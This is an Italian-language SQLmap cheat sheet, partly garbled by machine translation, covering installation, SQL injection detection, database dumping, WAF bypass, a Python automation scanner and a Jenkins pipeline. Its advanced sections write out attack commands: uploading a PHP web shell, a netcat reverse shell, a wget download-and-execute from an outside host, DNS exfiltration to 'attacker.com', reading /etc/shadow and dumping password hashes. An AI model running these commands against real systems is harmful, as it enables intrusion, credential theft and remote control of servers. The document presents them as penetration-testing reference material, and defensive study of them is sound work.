__FRONTMATTER_29_# SQLmap Cheat Sheet
HTML_TAG_18_ __HTML_TAG_21_📄 Generare PDF __HTML_TAG_23_
Panoramica¶
SQLmap è uno strumento di test di penetrazione open source che automatizza il processo di rilevamento e sfruttamento dei difetti di iniezione SQL e di controllo dei server di database. Sviluppato da Bernardo Damele e Miroslav Stampar, SQLmap è diventato lo standard de facto per i test SQL injection, fornendo capacità complete per identificare, sfruttare e post-exploitation di vulnerabilità SQL injection attraverso una vasta gamma di sistemi di gestione database. Gli algoritmi di rilevamento sofisticati dello strumento e l'ampio supporto del database lo rendono un componente essenziale del test di sicurezza delle applicazioni web e dei flussi di lavoro di valutazione della sicurezza del database.
La forza fondamentale di SQLmap risiede nel suo avanzato motore di rilevamento e sfruttamento di SQL injection, che supporta numerose tecniche di iniezione, tra cui cieca, cieca basata sul tempo, basati su errori, query-based UNION, stacked query e metodi di iniezione out-of-band. SQLmap può rilevare e sfruttare automaticamente le vulnerabilità di SQL injection in GET, POST, HTTP headers e parametri dei cookie, supportando diversi sistemi di gestione database tra cui MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB e Informix. Le capacità di impronta digitale intelligenti dello strumento possono identificare le versioni del database, i sistemi operativi sottostanti e le tecnologie applicative per ottimizzare le strategie di sfruttamento.
Il set completo di funzionalità di SQLmap include le funzionalità di elaborazione del database per l'estrazione di schemi, tabelle, colonne e dati, insieme alle funzionalità avanzate di post-esplorazione per l'accesso al file system, l'esecuzione dei comandi del sistema operativo e l'esfiltrazione dei dati fuori banda. Lo strumento supporta vari meccanismi di autenticazione, configurazioni proxy e tecniche di evasione per bypassare i firewall delle applicazioni web e i sistemi di rilevamento delle intrusioni. Con le sue ampie opzioni di personalizzazione, le funzionalità di registrazione dettagliate e il supporto di integrazione per le pipeline di test di sicurezza automatizzate, SQLmap fornisce sia la flessibilità di test manuale che le capacità di valutazione automatizzate per la validazione completa della sicurezza del database.
Installazione¶
## Ubuntu/Debian Installazione¶
Installazione di SQLmap sui sistemi Ubuntu/Debian:
# Update system packages
sudo apt update && sudo apt upgrade -y
# Install SQLmap from repositories
sudo apt install -y sqlmap
# Install dependencies
sudo apt install -y python3 python3-pip
# Verify installation
sqlmap --version
# Install latest version from source
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
# Run from source
python3 sqlmap.py --version
# Install additional dependencies
pip3 install -r requirements.txt
# Create symbolic link
sudo ln -sf $(pwd)/sqlmap.py /usr/local/bin/sqlmap
# Verify installation
sqlmap --version
CentOS/RHEL Installazione¶
# Install EPEL repository
sudo yum install -y epel-release
# Install Python and Git
sudo yum install -y python3 python3-pip git
# Clone SQLmap repository
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
# Install dependencies
pip3 install -r requirements.txt
# Create executable script
cat > /usr/local/bin/sqlmap ``<< 'EOF'
#!/bin/bash
python3 /opt/sqlmap/sqlmap.py "$@"
EOF
# Move SQLmap to /opt
sudo mv sqlmap /opt/
sudo chmod +x /usr/local/bin/sqlmap
# Verify installation
sqlmap --version
macOS Installazione¶
# Install using Homebrew
brew install sqlmap
# Install using MacPorts
sudo port install sqlmap
# Install from source
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python3 sqlmap.py --version
# Install Python dependencies
pip3 install -r requirements.txt
# Verify installation
sqlmap --version
Installazione di Windows¶
# Download from GitHub
# https://github.com/sqlmapproject/sqlmap/archive/master.zip
# Extract to desired location
# Example: C:\sqlmap
# Install Python 3.x from python.org
# Install dependencies
pip install -r requirements.txt
# Run SQLmap
python sqlmap.py --version
# Alternative: Install with Chocolatey
choco install sqlmap
# Verify installation
sqlmap --version
Installazione Docker¶
Running SQLmap in Docker:
# Pull official SQLmap image
docker pull paoloo/sqlmap
# Run basic scan
docker run --rm paoloo/sqlmap -u "http://example.com/page.php?id=1"
# Run with custom options
docker run --rm -v $(pwd):/data paoloo/sqlmap \
-u "http://example.com/page.php?id=1" \
--batch --output-dir=/data
# Create custom Dockerfile
cat >`` Dockerfile.sqlmap << 'EOF'
FROM python:3.9-alpine
# Install dependencies
RUN apk add --no-cache git
# Clone SQLmap
RUN git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git /opt/sqlmap
# Set working directory
WORKDIR /opt/sqlmap
# Install Python dependencies
RUN pip install -r requirements.txt
# Create entrypoint
ENTRYPOINT ["python3", "sqlmap.py"]
EOF
# Build custom image
docker build -f Dockerfile.sqlmap -t sqlmap-custom .
# Run custom image
docker run --rm sqlmap-custom --version
Uso di base¶
Specifiche di destinazione¶
Specificare gli obiettivi per i test SQL injection:
# Test single URL with parameter
sqlmap -u "http://example.com/page.php?id=1"
# Test URL with multiple parameters
sqlmap -u "http://example.com/page.php?id=1&name=test"
# Test specific parameter
sqlmap -u "http://example.com/page.php?id=1&name=test" -p id
# Test POST data
sqlmap -u "http://example.com/login.php" --data="username=admin&password=test"
# Test from request file
sqlmap -r request.txt
# Test from Burp Suite log
sqlmap -l burp.log
# Test with custom headers
sqlmap -u "http://example.com/page.php?id=1" \
--headers="X-Forwarded-For: 127.0.0.1\nUser-Agent: Custom Agent"
# Test with cookies
sqlmap -u "http://example.com/page.php?id=1" \
--cookie="PHPSESSID=abc123; user=admin"
# Test HTTP methods
sqlmap -u "http://example.com/api/user/1" --method=PUT
# Test with authentication
sqlmap -u "http://example.com/page.php?id=1" \
--auth-type=basic --auth-cred="admin:password"
# Test HTTPS with custom certificate
sqlmap -u "https://example.com/page.php?id=1" \
--ignore-ssl-errors
Opzioni di rilevamento¶
Configurazione del rilevamento di iniezione SQL:
# Basic detection
sqlmap -u "http://example.com/page.php?id=1"
# Specify injection techniques
sqlmap -u "http://example.com/page.php?id=1" --technique=BEUST
# B: Boolean-based blind
# E: Error-based
# U: Union query-based
# S: Stacked queries
# T: Time-based blind
# Test specific DBMS
sqlmap -u "http://example.com/page.php?id=1" --dbms=mysql
# Increase detection level
sqlmap -u "http://example.com/page.php?id=1" --level=5
# Increase risk level
sqlmap -u "http://example.com/page.php?id=1" --risk=3
# Test all parameters
sqlmap -u "http://example.com/page.php?id=1&name=test" --all
# Skip URL encoding
sqlmap -u "http://example.com/page.php?id=1" --skip-urlencode
# Custom injection payloads
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment
# Test with time delay
sqlmap -u "http://example.com/page.php?id=1" --time-sec=10
# Test with custom boundaries
sqlmap -u "http://example.com/page.php?id=1" --boundaries="*"
Database Enumeration¶
Enumerare le informazioni del database:
# Get current user
sqlmap -u "http://example.com/page.php?id=1" --current-user
# Get current database
sqlmap -u "http://example.com/page.php?id=1" --current-db
# Check if user is DBA
sqlmap -u "http://example.com/page.php?id=1" --is-dba
# List databases
sqlmap -u "http://example.com/page.php?id=1" --dbs
# List tables in database
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
# List columns in table
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --columns
# Dump table data
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
# Dump specific columns
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name -C "username,password" --dump
# Dump all databases
sqlmap -u "http://example.com/page.php?id=1" --dump-all
# Get database users
sqlmap -u "http://example.com/page.php?id=1" --users
# Get user passwords
sqlmap -u "http://example.com/page.php?id=1" --passwords
# Get user privileges
sqlmap -u "http://example.com/page.php?id=1" --privileges
# Get database schema
sqlmap -u "http://example.com/page.php?id=1" --schema
# Search for specific data
sqlmap -u "http://example.com/page.php?id=1" --search -C password
Caratteristiche avanzate¶
Accesso file system¶
Accedere al file system tramite SQL injection:
# Read file from file system
sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/passwd"
# Write file to file system
sqlmap -u "http://example.com/page.php?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
# Upload file via SQL injection
echo "<?php system(\$_GET['cmd']); ?>" > webshell.php
sqlmap -u "http://example.com/page.php?id=1" --file-write="webshell.php" --file-dest="/var/www/html/cmd.php"
# Read common configuration files
sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/mysql/my.cnf"
sqlmap -u "http://example.com/page.php?id=1" --file-read="/var/www/html/config.php"
sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/apache2/apache2.conf"
# Read application files
sqlmap -u "http://example.com/page.php?id=1" --file-read="/var/log/apache2/access.log"
sqlmap -u "http://example.com/page.php?id=1" --file-read="/var/log/mysql/error.log"
# Download multiple files
for file in /etc/passwd /etc/shadow /etc/hosts; do
sqlmap -u "http://example.com/page.php?id=1" --file-read="$file" --batch
done
Accesso al sistema operativo¶
Eseguire i comandi del sistema operativo:
# Execute OS commands
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="whoami"
# Interactive OS shell
sqlmap -u "http://example.com/page.php?id=1" --os-shell
# Execute PowerShell commands (Windows)
sqlmap -u "http://example.com/page.php?id=1" --os-pwn
# Upload and execute Meterpreter payload
sqlmap -u "http://example.com/page.php?id=1" --os-pwn --msf-path="/opt/metasploit-framework"
# Execute commands with specific user
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="id" --priv-esc
# Execute batch commands
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="uname -a; ps aux; netstat -tulpn"
# Create reverse shell
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="nc -e /bin/bash 192.168.1.100 4444"
# Download and execute script
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="wget http://192.168.1.100/script.sh -O /tmp/script.sh && chmod +x /tmp/script.sh && /tmp/script.sh"
WAF Bypass Techniques¶
Attraverso l'applicazione Web Firewalls:
# Use tamper scripts
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment
sqlmap -u "http://example.com/page.php?id=1" --tamper=charencode
sqlmap -u "http://example.com/page.php?id=1" --tamper=randomcase
# Multiple tamper scripts
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment,charencode,randomcase
# Common WAF bypass tampers
sqlmap -u "http://example.com/page.php?id=1" --tamper=apostrophemask
sqlmap -u "http://example.com/page.php?id=1" --tamper=equaltolike
sqlmap -u "http://example.com/page.php?id=1" --tamper=greatest
sqlmap -u "http://example.com/page.php?id=1" --tamper=halfversionedmorekeywords
sqlmap -u "http://example.com/page.php?id=1" --tamper=modsecurityversioned
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2mysqldash
sqlmap -u "http://example.com/page.php?id=1" --tamper=versionedkeywords
sqlmap -u "http://example.com/page.php?id=1" --tamper=versionedmorekeywords
# Custom User-Agent
sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1)"
# Random User-Agent
sqlmap -u "http://example.com/page.php?id=1" --random-agent
# Custom delay between requests
sqlmap -u "http://example.com/page.php?id=1" --delay=2
# Use proxy for requests
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
# Use Tor network
sqlmap -u "http://example.com/page.php?id=1" --tor --tor-type=SOCKS5
# Chunked transfer encoding
sqlmap -u "http://example.com/page.php?id=1" --chunked
Tecniche di iniezione avanzate¶
Tecniche di iniezione specializzate:
# Second-order SQL injection
sqlmap -u "http://example.com/register.php" --data="username=admin&email=test@test.com" --second-order="http://example.com/profile.php"
# DNS exfiltration
sqlmap -u "http://example.com/page.php?id=1" --dns-domain="attacker.com"
# Time-based blind injection with custom time
sqlmap -u "http://example.com/page.php?id=1" --technique=T --time-sec=5
# Union-based injection with custom columns
sqlmap -u "http://example.com/page.php?id=1" --technique=U --union-cols=1-20
# Error-based injection
sqlmap -u "http://example.com/page.php?id=1" --technique=E
# Boolean-based blind injection
sqlmap -u "http://example.com/page.php?id=1" --technique=B
# Stacked queries
sqlmap -u "http://example.com/page.php?id=1" --technique=S
# Custom injection point
sqlmap -u "http://example.com/page.php" --data="id=1*&name=test" --method=POST
# JSON injection
sqlmap -u "http://example.com/api/user" --data='\\\\{"id": 1*, "name": "test"\\\\}' --headers="Content-Type: application/json"
# XML injection
sqlmap -u "http://example.com/soap" --data='<?xml version="1.0"?><user><id>1*</id></user>' --headers="Content-Type: text/xml"
Automation Scripts¶
Comprehensive SQL Injection Scanner¶
#!/usr/bin/env python3
# Comprehensive SQL injection testing with SQLmap
import subprocess
import json
import os
import sys
import time
import argparse
from datetime import datetime
import xml.etree.ElementTree as ET
import requests
from urllib.parse import urlparse, parse_qs
class SQLmapScanner:
def __init__(self, sqlmap_path="sqlmap"):
self.sqlmap_path = sqlmap_path
self.results = \\\\{\\\\}
self.session_dir = f"/tmp/sqlmap_session_\\\\{int(time.time())\\\\}"
def verify_sqlmap_installation(self):
"""Verify SQLmap installation"""
try:
result = subprocess.run([self.sqlmap_path, "--version"],
capture_output=True, text=True)
if result.returncode == 0:
version_line = result.stdout.strip()
print(f"SQLmap version: \\\\{version_line\\\\}")
return True
else:
print("SQLmap not found or not working")
return False
except Exception as e:
print(f"Error checking SQLmap installation: \\\\{e\\\\}")
return False
def create_session_directory(self):
"""Create session directory for SQLmap output"""
try:
os.makedirs(self.session_dir, exist_ok=True)
print(f"Session directory created: \\\\{self.session_dir\\\\}")
return True
except Exception as e:
print(f"Error creating session directory: \\\\{e\\\\}")
return False
def test_url_for_sqli(self, url, method="GET", data=None, headers=None, cookies=None):
"""Test URL for SQL injection vulnerabilities"""
print(f"Testing URL for SQL injection: \\\\{url\\\\}")
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir,
"--level", "3",
"--risk", "2",
"--technique", "BEUST",
"--threads", "5"
]
if method.upper() == "POST" and data:
cmd.extend(["--data", data])
if headers:
header_string = "\n".join([f"\\\\{k\\\\}: \\\\{v\\\\}" for k, v in headers.items()])
cmd.extend(["--headers", header_string])
if cookies:
cookie_string = "; ".join([f"\\\\{k\\\\}=\\\\{v\\\\}" for k, v in cookies.items()])
cmd.extend(["--cookie", cookie_string])
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if result.returncode == 0:
vulnerable = self.parse_sqlmap_output(result.stdout)
return \\\\{
'vulnerable': vulnerable,
'output': result.stdout,
'error': result.stderr
\\\\}
else:
print(f"SQLmap test failed: \\\\{result.stderr\\\\}")
return \\\\{
'vulnerable': False,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
print("SQLmap test timed out")
return \\\\{
'vulnerable': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
print(f"Error during SQLmap test: \\\\{e\\\\}")
return \\\\{
'vulnerable': False,
'output': "",
'error': str(e)
\\\\}
def parse_sqlmap_output(self, output):
"""Parse SQLmap output to determine if vulnerable"""
vulnerable_indicators = [
"is vulnerable",
"injectable",
"Parameter:",
"Type:",
"Title:",
"Payload:"
]
for indicator in vulnerable_indicators:
if indicator in output:
return True
return False
def enumerate_database(self, url, method="GET", data=None):
"""Enumerate database information"""
print(f"Enumerating database for: \\\\{url\\\\}")
enumeration_commands = [
["--current-user"],
["--current-db"],
["--is-dba"],
["--dbs"],
["--users"],
["--passwords"]
]
enumeration_results = \\\\{\\\\}
for enum_cmd in enumeration_commands:
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir
]
if method.upper() == "POST" and data:
cmd.extend(["--data", data])
cmd.extend(enum_cmd)
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
if result.returncode == 0:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': result.stdout,
'success': True
\\\\}
else:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': result.stderr,
'success': False
\\\\}
except subprocess.TimeoutExpired:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': "Timeout",
'success': False
\\\\}
except Exception as e:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': str(e),
'success': False
\\\\}
return enumeration_results
def dump_database_data(self, url, database=None, table=None, columns=None):
"""Dump database data"""
print(f"Dumping database data for: \\\\{url\\\\}")
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir
]
if database and table and columns:
cmd.extend(["-D", database, "-T", table, "-C", columns, "--dump"])
elif database and table:
cmd.extend(["-D", database, "-T", table, "--dump"])
elif database:
cmd.extend(["-D", database, "--tables"])
else:
cmd.extend(["--dbs"])
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if result.returncode == 0:
return \\\\{
'success': True,
'output': result.stdout,
'error': result.stderr
\\\\}
else:
return \\\\{
'success': False,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
return \\\\{
'success': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
return \\\\{
'success': False,
'output': "",
'error': str(e)
\\\\}
def test_file_access(self, url):
"""Test file system access capabilities"""
print(f"Testing file access for: \\\\{url\\\\}")
test_files = [
"/etc/passwd",
"/etc/hosts",
"/var/www/html/index.php",
"C:\\Windows\\System32\\drivers\\etc\\hosts",
"C:\\inetpub\\wwwroot\\web.config"
]
file_access_results = \\\\{\\\\}
for test_file in test_files:
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir,
"--file-read", test_file
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
file_access_results[test_file] = \\\\{
'accessible': result.returncode == 0 and "do you want to retrieve" not in result.stdout,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
file_access_results[test_file] = \\\\{
'accessible': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
file_access_results[test_file] = \\\\{
'accessible': False,
'output': "",
'error': str(e)
\\\\}
return file_access_results
def test_os_access(self, url):
"""Test operating system command execution"""
print(f"Testing OS access for: \\\\{url\\\\}")
test_commands = [
"whoami",
"id",
"uname -a",
"systeminfo"
]
os_access_results = \\\\{\\\\}
for test_cmd in test_commands:
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir,
"--os-cmd", test_cmd
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
os_access_results[test_cmd] = \\\\{
'executed': result.returncode == 0 and "command standard output" in result.stdout,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
os_access_results[test_cmd] = \\\\{
'executed': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
os_access_results[test_cmd] = \\\\{
'executed': False,
'output': "",
'error': str(e)
\\\\}
return os_access_results
def comprehensive_scan(self, target_urls, output_dir="/tmp/sqlmap_comprehensive"):
"""Perform comprehensive SQL injection assessment"""
print("Starting comprehensive SQL injection assessment...")
# Create output directory
os.makedirs(output_dir, exist_ok=True)
assessment_results = \\\\{
'start_time': time.time(),
'target_urls': target_urls,
'vulnerable_urls': [],
'enumeration_results': \\\\{\\\\},
'file_access_results': \\\\{\\\\},
'os_access_results': \\\\{\\\\},
'dump_results': \\\\{\\\\}
\\\\}
for url in target_urls:
print(f"Testing URL: \\\\{url\\\\}")
# Test for SQL injection
sqli_result = self.test_url_for_sqli(url)
if sqli_result['vulnerable']:
print(f"SQL injection found in: \\\\{url\\\\}")
assessment_results['vulnerable_urls'].append(url)
# Enumerate database
enum_results = self.enumerate_database(url)
assessment_results['enumeration_results'][url] = enum_results
# Test file access
file_results = self.test_file_access(url)
assessment_results['file_access_results'][url] = file_results
# Test OS access
os_results = self.test_os_access(url)
assessment_results['os_access_results'][url] = os_results
# Dump sample data
dump_results = self.dump_database_data(url)
assessment_results['dump_results'][url] = dump_results
else:
print(f"No SQL injection found in: \\\\{url\\\\}")
assessment_results['end_time'] = time.time()
assessment_results['duration'] = assessment_results['end_time'] - assessment_results['start_time']
# Generate reports
self.generate_json_report(assessment_results, os.path.join(output_dir, "sqlmap_results.json"))
self.generate_html_report(assessment_results, os.path.join(output_dir, "sqlmap_report.html"))
print(f"Comprehensive assessment completed in \\\\{assessment_results['duration']:.2f\\\\} seconds")
print(f"Found SQL injection in \\\\{len(assessment_results['vulnerable_urls'])\\\\} URLs")
return assessment_results
def generate_json_report(self, results, output_file):
"""Generate JSON report"""
with open(output_file, 'w') as f:
json.dump(results, f, indent=2, default=str)
print(f"JSON report generated: \\\\{output_file\\\\}")
def generate_html_report(self, results, output_file):
"""Generate HTML report"""
html_content = f"""
<!DOCTYPE html>
<html>
<head>
<title>SQLmap Comprehensive Assessment Report</title>
<style>
body \\\\{\\\\{ font-family: Arial, sans-serif; margin: 20px; \\\\}\\\\}
.section \\\\{\\\\{ margin: 20px 0; padding: 15px; border: 1px solid #ddd; \\\\}\\\\}
.critical \\\\{\\\\{ color: red; font-weight: bold; \\\\}\\\\}
.warning \\\\{\\\\{ color: orange; font-weight: bold; \\\\}\\\\}
.info \\\\{\\\\{ color: blue; \\\\}\\\\}
.success \\\\{\\\\{ color: green; font-weight: bold; \\\\}\\\\}
table \\\\{\\\\{ border-collapse: collapse; width: 100%; \\\\}\\\\}
th, td \\\\{\\\\{ border: 1px solid #ddd; padding: 8px; text-align: left; \\\\}\\\\}
th \\\\{\\\\{ background-color: #f2f2f2; \\\\}\\\\}
pre \\\\{\\\\{ background: #f5f5f5; padding: 10px; overflow-x: auto; \\\\}\\\\}
</style>
</head>
<body>
<h1>SQLmap Comprehensive Assessment Report</h1>
<p>Generated: \\\\{datetime.now().isoformat()\\\\}</p>
<p>Assessment Duration: \\\\{results['duration']:.2f\\\\} seconds</p>
<div class="section">
<h2>Executive Summary</h2>
<ul>
<li>Total URLs Tested: \\\\{len(results['target_urls'])\\\\}</li>
<li class="critical">Vulnerable URLs: \\\\{len(results['vulnerable_urls'])\\\\}</li>
<li>File Access Possible: \\\\{sum(1 for url_results in results['file_access_results'].values() for file_result in url_results.values() if file_result['accessible'])\\\\}</li>
<li>OS Command Execution: \\\\{sum(1 for url_results in results['os_access_results'].values() for cmd_result in url_results.values() if cmd_result['executed'])\\\\}</li>
</ul>
</div>
<div class="section">
<h2 class="critical">Vulnerable URLs</h2>
<table>
<tr><th>URL</th><th>Database Access</th><th>File Access</th><th>OS Access</th></tr>
"""
for url in results['vulnerable_urls']:
db_access = "Yes" if url in results['enumeration_results'] else "No"
file_access = "Yes" if any(f['accessible'] for f in results['file_access_results'].get(url, \\\\{\\\\}).values()) else "No"
os_access = "Yes" if any(c['executed'] for c in results['os_access_results'].get(url, \\\\{\\\\}).values()) else "No"
html_content += f"""
<tr>
<td>\\\\{url\\\\}</td>
<td>\\\\{db_access\\\\}</td>
<td>\\\\{file_access\\\\}</td>
<td>\\\\{os_access\\\\}</td>
</tr>"""
html_content += """
</table>
</div>
<div class="section">
<h2>Detailed Findings</h2>
"""
for url in results['vulnerable_urls']:
html_content += f"""
<h3>\\\\{url\\\\}</h3>
<h4>Database Enumeration</h4>
<pre>\\\\{json.dumps(results['enumeration_results'].get(url, \\\\{\\\\}), indent=2)\\\\}</pre>
<h4>File Access Results</h4>
<pre>\\\\{json.dumps(results['file_access_results'].get(url, \\\\{\\\\}), indent=2)\\\\}</pre>
<h4>OS Access Results</h4>
<pre>\\\\{json.dumps(results['os_access_results'].get(url, \\\\{\\\\}), indent=2)\\\\}</pre>
"""
html_content += """
</div>
<div class="section">
<h2>Recommendations</h2>
<ul>
<li>Implement parameterized queries/prepared statements</li>
<li>Use input validation and sanitization</li>
<li>Apply principle of least privilege for database accounts</li>
<li>Implement Web Application Firewall (WAF)</li>
<li>Regular security code reviews and testing</li>
<li>Keep database software updated</li>
<li>Monitor database access and queries</li>
</ul>
</div>
</body>
</html>
"""
with open(output_file, 'w') as f:
f.write(html_content)
print(f"HTML report generated: \\\\{output_file\\\\}")
def main():
parser = argparse.ArgumentParser(description='SQLmap Comprehensive Scanner')
parser.add_argument('--urls', nargs='+', required=True, help='URLs to test')
parser.add_argument('--output', default='/tmp/sqlmap_assessment', help='Output directory')
parser.add_argument('--sqlmap-path', default='sqlmap', help='Path to SQLmap executable')
args = parser.parse_args()
# Initialize scanner
scanner = SQLmapScanner(args.sqlmap_path)
# Verify installation
if not scanner.verify_sqlmap_installation():
print("SQLmap not properly installed or configured")
sys.exit(1)
# Create session directory
if not scanner.create_session_directory():
print("Failed to create session directory")
sys.exit(1)
# Run comprehensive scan
results = scanner.comprehensive_scan(args.urls, args.output)
if results:
print("Comprehensive assessment completed successfully")
else:
print("Comprehensive assessment failed")
sys.exit(1)
if __name__ == "__main__":
main()
Esempi di integrazione¶
CI/CD Integrazione¶
# Jenkins Pipeline for SQLmap Integration
pipeline \\\\{
agent \\\\{
label 'security-testing'
\\\\}
environment \\\\{
TARGET_URL = 'http://test-app.company.com'
SQLMAP_OUTPUT = './sqlmap-results'
\\\\}
stages \\\\{
stage('Setup Environment') \\\\{
steps \\\\{
script \\\\{
// Install SQLmap if not present
sh '''
if ! command -v sqlmap &> /dev/null; then
git clone https://github.com/sqlmapproject/sqlmap.git
export PATH=$PATH:$(pwd)/sqlmap
fi
sqlmap --version
'''
\\\\}
\\\\}
\\\\}
stage('SQL Injection Testing') \\\\{
steps \\\\{
script \\\\{
// Run SQLmap tests
sh '''
mkdir -p $\\\\{SQLMAP_OUTPUT\\\\}
# Test main application endpoints
python3 sqlmap_scanner.py \
--urls "$\\\\{TARGET_URL\\\\}/login.php?id=1" \
"$\\\\{TARGET_URL\\\\}/search.php?q=test" \
"$\\\\{TARGET_URL\\\\}/product.php?id=1" \
--output $\\\\{SQLMAP_OUTPUT\\\\}
'''
\\\\}
\\\\}
\\\\}
stage('Process Results') \\\\{
steps \\\\{
// Archive results
archiveArtifacts artifacts: 'sqlmap-results/**/*', fingerprint: true
// Publish report
publishHTML([
allowMissing: false,
alwaysLinkToLastBuild: true,
keepAll: true,
reportDir: 'sqlmap-results',
reportFiles: '*.html',
reportName: 'SQLmap Assessment Report'
])
// Check for vulnerabilities
script \\\\{
def vulnerabilities = sh(
script: "grep -c 'vulnerable' sqlmap-results/*.json||true",
returnStdout: true
).trim()
if (vulnerabilities.toInteger() > 0) \\\\{
currentBuild.result = 'UNSTABLE'
echo "Found $\\\\{vulnerabilities\\\\} SQL injection vulnerabilities"
\\\\}
\\\\}
\\\\}
\\\\}
\\\\}
post \\\\{
always \\\\{
// Clean up sensitive data
sh 'rm -rf sqlmap-results/*.log'
\\\\}
failure \\\\{
// Send notification
emailext (
subject: "SQL Injection Testing Failed: $\\\\{env.JOB_NAME\\\\} - $\\\\{env.BUILD_NUMBER\\\\}",
body: "SQL injection testing failed. Check console output for details.",
to: "$\\\\{env.SECURITY_TEAM_EMAIL\\\\}"
)
\\\\}
\\\\}
\\\\}
Risoluzione dei problemi¶
Questioni comuni¶
** Problemi di connessione: ** Traduzione:
** Problemi di rilevamento: ** Traduzione:
Revisione: Traduzione:
Ottimizzazione delle prestazioni¶
Ottimizzazione delle prestazioni SQLmap:
# Increase threads
sqlmap -u "http://example.com/page.php?id=1" --threads=10
# Optimize for speed
sqlmap -u "http://example.com/page.php?id=1" --level=1 --risk=1
# Skip unnecessary tests
sqlmap -u "http://example.com/page.php?id=1" --skip-waf
# Use specific technique
sqlmap -u "http://example.com/page.php?id=1" --technique=U
# Limit data retrieval
sqlmap -u "http://example.com/page.php?id=1" -D database -T table --start=1 --stop=100
Considerazioni di sicurezza¶
Sicurezza operativa¶
** Uso legale ed etico: ** - No. Solo le applicazioni di prova che possiedi o hai il permesso esplicito di testare - Comprendi i requisiti legali per il test delle applicazioni web nella tua giurisdizione - Implementare procedure di autorizzazione e documentazione adeguate - Limitazioni di portata e regole di impegno - No. Essere consapevoli del potenziale esposizione dei dati e della disgregazione dei servizi
** Protezione dei dati. - Crittografia file di sessione SQLmap e dati di uscita - Attuazione politiche di conservazione dei dati sicure per i risultati di valutazione - Controllo dell'accesso a strumenti e risultati SQL injection test - Trasmissione sicura dei rapporti di valutazione e dei risultati - Pulizia regolare dei file temporanei e dei dati di sessione
Considerazioni difensive¶
**Detezione e prevenzione: ** - Monitor per le firme SQLmap e i modelli SQL injection - Implement Web Application Firewalls (WAF) con protezione SQL injection - Monitoraggio delle attività del database e rilevamento di anomalie - Regolari recensioni dei codici di sicurezza e analisi statica - Validazione input e implementazione di query parametrizzata
Referenze¶
- [SQLmap Documentazione ufficiale](URL_24__
- SQLmap GitHub Repository
- OWASP SQL Injection Prevention
- SQL Guida alla prova di iniezione
- Database Security Best Practices